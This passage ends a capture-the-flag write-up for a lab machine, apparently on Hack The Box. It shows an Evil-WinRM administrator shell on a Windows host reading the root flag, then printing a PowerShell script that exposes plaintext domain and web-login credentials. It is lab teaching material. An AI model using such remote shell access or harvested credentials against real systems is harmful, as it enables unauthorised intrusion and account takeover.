/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated *Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated <ROOT_FLAG>

And as bonus we can take a look of at an interresting powershell file

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir


Directory: C:\Users\Administrator\Documents

Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/22/2019 8:24 AM 343 chase.ps1

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat chase.ps1 $u = 'supportdesk\chase' $p = convertto-securestring 'Q4)sJu\Y8qz*A3?d' -asplain -force $c = new-object system.management.automation.pscredential($u, $p) start-process 'C:\Program Files\Mozilla Firefox\firefox.exe' -Credential $c -ArgumentList 'localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login='
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit
Info: Exiting with code 0

References

Daniel Simao 08:25, 6 March 2020 (EST)